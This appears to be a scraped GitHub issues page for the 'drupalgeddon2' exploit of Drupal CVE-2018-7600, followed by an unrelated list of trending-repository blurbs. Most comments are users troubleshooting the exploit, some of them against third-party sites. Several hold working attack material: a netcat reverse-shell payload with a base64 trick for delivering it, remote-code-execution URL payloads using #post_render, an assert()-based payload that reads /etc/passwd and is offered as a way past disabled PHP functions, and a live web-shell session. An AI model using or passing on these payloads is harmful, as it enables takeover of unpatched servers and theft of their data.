dreadlocked / drupalgeddon2 Goto Github PK
View Code? Open in Web Editor NEWExploit for Drupal v7.x + v8.x (Drupalgeddon 2 / CVE-2018-7600 / SA-CORE-2018-002)
Exploit for Drupal v7.x + v8.x (Drupalgeddon 2 / CVE-2018-7600 / SA-CORE-2018-002)
FIXED
when ever it writes here, something is just wrong
In Drupal 7.37, there are form_id and form_build_id why vulnerabilities are not available.
gogu@GoguSclipici:~/dld/1$ ruby drupalgeddon2-customizable-beta.rb https://192.168.1.10/ 7 "ps x" "system" "1"
Requesting: 192.168.1.10//user/password/?name[%23post_render][]=system&name[%23markup]=ps%20x&name[%23type]=markup
POST: form_id=user_pass&_triggering_element_name=name
302
drupalgeddon2-customizable-beta.rb:86:in `get_form_build_id': undefined method `[]' for nil:NilClass (NoMethodError)
from drupalgeddon2-customizable-beta.rb:115:in `exploit'
from drupalgeddon2-customizable-beta.rb:167:in `<main>'
gogu@GoguSclipici:~/dld/1$ ruby drupalgeddon2-customizable-beta.rb https://192.168.1.10/ 7 "ps x" "system" "0"
Requesting: 192.168.1.10//user/password/?name[%23post_render][]=system&name[%23markup]=ps%20x&name[%23type]=markup
POST: form_id=user_pass&_triggering_element_name=name
302
drupalgeddon2-customizable-beta.rb:86:in `get_form_build_id': undefined method `[]' for nil:NilClass (NoMethodError)
from drupalgeddon2-customizable-beta.rb:115:in `exploit'
from drupalgeddon2-customizable-beta.rb:167:in `<main>'
no matter what i chose it still uses /user/password
if i dont put any 4th argument it runs fine with /?q=user/password&name
Hello guys, just wanted to thank you for porting the exploit to Ruby. I've added the exploit with some quick modifications to CVE-in-Ruby repository here. All rights have been reserved to you
I've added Readline loop just to make interacting with uploaded shell all from the same exploit
[*] --==[::#Drupalggedon2::]==--
[+] Target seems to be exploitable! w00hooOO!
[+] PHP shell: http://172.17.0.2/s.php?c=CMD
[+] Type your commands (exit to exit) and press Enter!
Drupalgeddon2-> whoami
www-data
Drupalgeddon2-> pwd
/var/www/html
Drupalgeddon2->
Please let know if you have an issue with that, if yes, I can rewrite the exploit again.
Appreciate your efforts, guys
drupalgeddon2.1.rb:86:in exploit': undefined method
[]' for nil:NilClass (NoMethodError)
from drupalgeddon2.1.rb:125:in `
Hi!
When I try use this exploit on few sites, I get error:
Didn't detect any output (disabled PHP function?)
Why?
[*] --==[::#Drupalggedon2::]==--
--------------------------------------------------------------------------------
[i] Target : http://EXAMPLE.ru/
--------------------------------------------------------------------------------
[+] Found : http://EXAMPLE.ru/CHANGELOG.txt (HTTP Response: 200)
[+] Drupal!: v7.54
--------------------------------------------------------------------------------
[*] Testing: Code Execution
[i] Payload: echo NNWXFZNT
[!] WARNING: Target might to be exploitable [2]... Didn't detect any output (disabled PHP function?)
drupalgeddon2.rb:147:in <main>': undefined method
strip' for nil:NilClass (NoMethodError)
Hi
After the recent update, the script is failing to identify the version of Drupal.
[!] MISSING: https://example.com/CHANGELOG.txt (405)
But when in fact the https://example.com/CHANGELOG.txt
file is present and also gives HTTP 200.
Hi!
I'm sure you heard about the big news regarding another security hole prone to RCE against Drupal 7.X & 8.X. I was wondering if you plan on adding support for this bug in this PoC?
References;
https://www.drupal.org/sa-core-2018-004
https://www.bleepingcomputer.com/news/security/hackers-dont-give-site-owners-time-to-patch-start-exploiting-new-drupal-flaw-within-hours/
Hi !
Thanks for sharing those PoCs with the community :) I was wondering if you know how to exploit Drupal 6.* ?
So far;
Drupal 7 is with /user/password
Drupal 8 is with /user/register
Thanks!
If any of the URLs referred to in order to guess the Drupal version returns 200, even though given the response body does not allow to actually determine the version, the iteration stops (break).
Therefore, the next URLs are never checked.
I have tested it against drupal version 8.5.0
. (but should be applicable to all versions supported)
I was trying to get reverse shell using the exploit with the payload rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.16 443 >/tmp/f
which failed due to not being escaped and some url encoding problems.
I have fixed the issue by encoding the user payloads to base64 and then encoding it with url encoding, this will help the payload to be delivered successfully without any kind of escaping to be done at the our end.
# Encoding for better Code Execution - @m4lv0id
command = "echo " + Base64.strict_encode64(command) + " | base64 -d | sh"
command = URI::encode(command)
command = command.gsub('+','%2b')
puts "Command : #{command}"
Feel free to add these line to the exploit and all good to go. :)
Not works on drupal 6 any idea to adapt this exploit. Normally is also vulnerable.
Thx
Target: Drupal 7.31
[!] FAILED: Coudn't find writeable web path
[*] Dropping back direct commands (expect an ugly shell!)
drupalgeddon2>> whoami
[{"command":"settings","settings":{"basePath":"/","pathPrefix":"","ajaxPageState":{"theme":"ita_members","theme_token":"RISro4XrxuW9kMvaaHHLKNxEu6YecYzfpzRPGhXbhpI"}},"merge":true},{"command":"insert","method":"replaceWith","selector":null,"data":"\u003Cspan class=\u0022ajax-new-content\u0022\u003E\u003C/span\u003E","settings":{"basePath":"/","pathPrefix":"","ajaxPageState":{"theme":"ita_members","theme_token":"RISro4XrxuW9kMvaaHHLKNxEu6YecYzfpzRPGhXbhpI"}}}]
[*] Testing: Code Execution (Method: name)
[i] Payload: echo ZLUKVHEH
/usr/lib/ruby/3.1.0/socket.rb:452:in __read_nonblock': Connection reset by peer (Errno::ECONNRESET) from /usr/lib/ruby/3.1.0/socket.rb:452:in
read_nonblock'
from /usr/lib/ruby/3.1.0/net/protocol.rb:212:in rbuf_fill' from /usr/lib/ruby/3.1.0/net/protocol.rb:193:in
readuntil'
from /usr/lib/ruby/3.1.0/net/protocol.rb:203:in readline' from /usr/lib/ruby/3.1.0/net/http/response.rb:42:in
read_status_line'
from /usr/lib/ruby/3.1.0/net/http/response.rb:31:in read_new' from /usr/lib/ruby/3.1.0/net/http.rb:1575:in
block in transport_request'
from /usr/lib/ruby/3.1.0/net/http.rb:1566:in catch' from /usr/lib/ruby/3.1.0/net/http.rb:1566:in
transport_request'
from /usr/lib/ruby/3.1.0/net/http.rb:1539:in request' from /usr/lib/ruby/3.1.0/net/http.rb:1532:in
block in request'
from /usr/lib/ruby/3.1.0/net/http.rb:966:in start' from /usr/lib/ruby/3.1.0/net/http.rb:1530:in
request'
from drupalgeddon2.rb:53:in http_request' from drupalgeddon2.rb:96:in
gen_evil_url'
from drupalgeddon2.rb:475:in block in <main>' from drupalgeddon2.rb:467:in
each'
from drupalgeddon2.rb:467:in `
When I manually check through browser https://**************.org/CHANGELOG.txt I can see it. But via the script it says missing changelog.txt and forcing for D8 exploit .
seems like drupalgeddon2 cant work properly when testing on insecure URL .
Support for exploting a website protected by authentication
on some hosts i get this
/usr/lib/ruby/2.3.0/net/http.rb:1561:in addr_port': undefined method
+' for nil:NilClass (NoMethodError)
i cant figure out what this error relates to.
anyone have any ideea?
I deployed a fresh install of "drupal-8.3.5" and I'm trying to use the "drupalgeddon2-not-write-shell.rb" version of the exploit.
I run the exploit with the following parameters:
ruby drupalgeddon2-not-write-shell.rb <ip_address> id passthru 1
The output says that the target seems to be exploitable but I'm not receiving anything back.
I missed something?
Thanks.
Traceback (most recent call last):
2: from drupalgeddon2.rb:16:in <main>' 1: from /usr/local/lib/site_ruby/2.5.0/rubygems/core_ext/kernel_require.rb:54:in
require'
/usr/local/lib/site_ruby/2.5.0/rubygems/core_ext/kernel_require.rb:54:in `require': cannot load such file -- highline/import (LoadError)
Hi!
Instead of use exec or passthru is far better to use assert, so you can eval custom PHP code. In this way you can avoid disable_functions issues :).
Example of a valid payload:
{'q':'user/password', 'name[0][#post_render][]':'assert', 'name[0][#markup]': $COMMAND . ' !== "X-C3LL";', 'name[0][#type]':'markup'}
So you can do things like:
{'q':'user/password', 'name[0][#post_render][]':'assert', 'name[0][#markup]':'readfile("/etc/passwd") !== "X-C3LL";', 'name[0][#type]':'markup'}
Hi,
#attack machine
kali 2020_03 full updated
#target
OS: Windows
webserver: IIS8.5
Drupal v7.54
https://www.local.com/CHANGELOG.txt
Tried with the 'try_phpshell = true' and 'try_phpshell = false' not runing.
Any ideas i could try?
[*] Testing: Form (user/password)
[+] Result : Form valid
[*] Testing: Code Execution (Method: name)
[i] Payload: echo EOLRQNNO
Traceback (most recent call last):
7: from drupalgeddon2.rb:463:in <main>' 6: from drupalgeddon2.rb:463:in
each'
5: from drupalgeddon2.rb:473:in block in <main>' 4: from drupalgeddon2.rb:44:in
http_request'
3: from /usr/lib/ruby/2.7.0/uri/common.rb:737:in URI' 2: from /usr/lib/ruby/2.7.0/uri/common.rb:234:in
parse'
1: from /usr/lib/ruby/2.7.0/uri/rfc3986_parser.rb:73:in parse' /usr/lib/ruby/2.7.0/uri/rfc3986_parser.rb:21:in
split': URI must be ascii only "https://www.local.com/?q=file/ajax/name/%23value/form-2sKgFeXBW8q3Ukw1XT7U6wHkN_RxDjP0zcrXhWGxt68\\" /><input type=\"hidden\" name=\"form_id\" value=\"search_block_form\" /><div style=\"clear:both\"><div class=\"block-sep\"><div id=\"navigation\" role=\"navigation\" class=\"clearfix\"><div class=\"constrain\"><div id=\"nav-left\"><div id=\"nav-right\"><ul id=\"navmenu\" class=\"sf-menu sf-js-enabled sf-shadow\">
Traceback (most recent call last):
File "/usr/local/bin/olevba", line 33, in
sys.exit(load_entry_point('oletools==0.60.1.dev2', 'console_scripts', 'olevba')())
File "/usr/local/bin/olevba", line 25, in importlib_load_entry_point
return next(matches).load()
File "/usr/local/lib/python3.9/importlib/metadata.py", line 77, in load
module = import_module(match.group('module'))
File "/usr/local/lib/python3.9/importlib/init.py", line 127, in import_module
return _bootstrap._gcd_import(name[level:], package, level)
File "", line 1030, in _gcd_import
File "", line 1007, in _find_and_load
File "", line 986, in _find_and_load_unlocked
File "", line 680, in _load_unlocked
File "", line 790, in exec_module
File "", line 228, in _call_with_frames_removed
File "/usr/local/lib/python3.9/site-packages/oletools-0.60.1.dev2-py3.9.egg/oletools/olevba.py", line 307, in
import colorclass
ModuleNotFoundError: No module named 'colorclass'
Hi,
Tested this on 8.4.5 / 8.5.0 and exploit fails every time
3 different VMs with RHEL7 / PHP7
[!] Exploit FAILED ~ Response: 404
Thanks
Hey, I've tested it on 8.4.5, 8.3.7 and it works.
However, it fails on 7.5.5.
user@debian:~/drupwn/testpwn$ ruby drupalgeddon2.rb https://testsite whoami
[+] Target seems to be exploitable! w00hooOO!
/usr/lib/ruby/2.3.0/json/common.rb:156:in
parse': 784: unexpected token at '!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" (JSON::ParserError)
"http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"`
And after this goes just plain drupal html.
Traceback (most recent call last):
2: from drupalgeddon2.rb:16:in <main>' 1: from /usr/lib/ruby/2.5.0/rubygems/core_ext/kernel_require.rb:59:in
require'
/usr/lib/ruby/2.5.0/rubygems/core_ext/kernel_require.rb:59:in `require': cannot load such file -- highline/import (LoadError)
Hi!
Thank you for sharing this PoC! It works like a charm on my 7.28 and 7.56.
However, on 7.9 site I only get
[*] --==[::#Drupalggedon2::]==--
--------------------------------------------------------------------------------
[*] Target : http://xxxxx/
--------------------------------------------------------------------------------
[!] MISSING: http://xxxxx/CHANGELOG.txt (404)
[!] MISSING: http://xxxxx/core/CHANGELOG.txt (404)
[+] Found : http://xxxxx/includes/bootstrap.inc (200)
[+] Drupal!: can detect a matching directory
--------------------------------------------------------------------------------
[*] Testing: Code Execution
[*] Payload: echo TZPPOZNH
[!] Unsupported Drupal version
Obviously, exploit encounters some problems while determining drupal version.
Earlier versions of the exploit respond with
*nothing interesting above, I think*
[+] Drupal!: can detect a matching directory
--------------------------------------------------------------------------------
[*] PHP cmd: passthru
--------------------------------------------------------------------------------
[+] Target seems to be exploitable! w00hooOO!
[+] Result: *lots of html code of http://xxxxx/?q=user/password/*
--------------------------------------------------------------------------------
[*] curl 'http://xxxxx/s.php' -d 'c=whoami'
--------------------------------------------------------------------------------
[!] Exploit FAILED ~ Response: 404
I would appreciate any help getting this exploit to work.
Thanks in advance.
Regards,
kill-20
Thank u guys for this xpl,
I was trying to make this work w/ user/password form instead user/login(disabled),
[{"command":"settings","settings":{"basePath":"/drupal-7.43/","pathPrefix":"","ajaxPageState":{"theme":"bartik","theme_token":"ujFkz760YMJYxE-x5scsgNLjtT8tG0d6YB_gCizLJ-U"}},"merge":true},{"command":"insert","method":"replaceWith","selector":null,"data":"\u003Cdiv class=\u0022messages error\u0022\u003E\n\u003Ch2 class=\u0022element-invisible\u0022\u003EError message\u003C/h2\u003E\n \u003Cul\u003E\n \u003Cli\u003E\u003Cem class=\u0022placeholder\u0022\u003ENotice\u003C/em\u003E: Undefined index: #value in \u003Cem class=\u0022placeholder\u0022\u003Efile_ajax_upload()\u003C/em\u003E (line \u003Cem class=\u0022placeholder\u0022\u003E262\u003C/em\u003E of \u003Cem class=\u0022placeholder\u0022\u003EC:\xampp\htdocs\drupal-7.43\modules\file\file.module\u003C/em\u003E).\u003C/li\u003E\n \u003Cli\u003E\u003Cem class=\u0022placeholder\u0022\u003ENotice\u003C/em\u003E: Undefined index: #suffix in \u003Cem class=\u0022placeholder\u0022\u003Efile_ajax_upload()\u003C/em\u003E (line \u003Cem class=\u0022placeholder\u0022\u003E280\u003C/em\u003E of \u003Cem class=\u0022placeholder\u0022\u003EC:\xampp\htdocs\drupal-7.43\modules\file\file.module\u003C/em\u003E).\u003C/li\u003E\n \u003C/ul\u003E\n\u003C/div\u003E\n\u003Cspan class=\u0022ajax-new-content\u0022\u003E\u003C/span\u003E","settings":{"basePath":"/drupal-7.43/","pathPrefix":"","ajaxPageState":{"theme":"bartik","theme_token":"ujFkz760YMJYxE-x5scsgNLjtT8tG0d6YB_gCizLJ-U"}}}]
I also changed the form_id, I think the problem was on _triggering_element_name..
well drupalgeddon2.rb said shell is wroted in Root Dir
[i] Fake shell: curl 'https://site.com/user/password/s.php' -d 'c=hostname'
but it doesn't execute the command as well as it just hang my terminal
see the screenshot :(
Hi, I have this error in blackarch (archlinux):
drupalgeddon2.rb:131:in <main>': undefined local variable or method
http' for main:Object (NameError)
Currently the verbosity level is hard-coded. It would be useful to control it via command-line argument.
First of all- great tool, thanks!
I'm getting a weird result when checking a site that runs Drupal v8.x:
Drupalgeddon result-
[+] Found : https://xxxxx/CHANGELOG.txt (HTTP Response: 200)
[!] WARNING: Could be a false-positive [1-1], as the file could be reported to be missing
[!] WARNING: Unable to detect keyword 'drupal.org'
[+] Found : https://xxxxx/core/CHANGELOG.txt (HTTP Response: 200)
[+] Found : https://xxxxx/includes/bootstrap.inc (HTTP Response: 200)
[+] Found : https://xxxxx/core/includes/bootstrap.inc (HTTP Response: 403)
[+] Found : https://xxxxx/includes/database.inc (HTTP Response: 200)
[+] Drupal?: v6.x
[-] Unsupported Drupal version (6.x)
I've tried running the customizable script, returns an error:
"drupalgeddon2-customizable-beta.rb:69:in `+': no implicit conversion of nil into String (TypeError)"
Any ideas?
Hi dear.
I have target site with old Drupal 7. I was sure your script will do it's work, but please see output below.
Can you help?
[*] Testing: Code Execution
[i] Payload: echo VXAPFBDO
[!] WARNING: Didn't detect form_build_id
[!] Target is NOT exploitable ~ HTTP Response: 302
Please provide Drupal 6.x possible exploit parameters.
A declarative, efficient, and flexible JavaScript library for building user interfaces.
๐ Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. ๐๐๐
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google โค๏ธ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.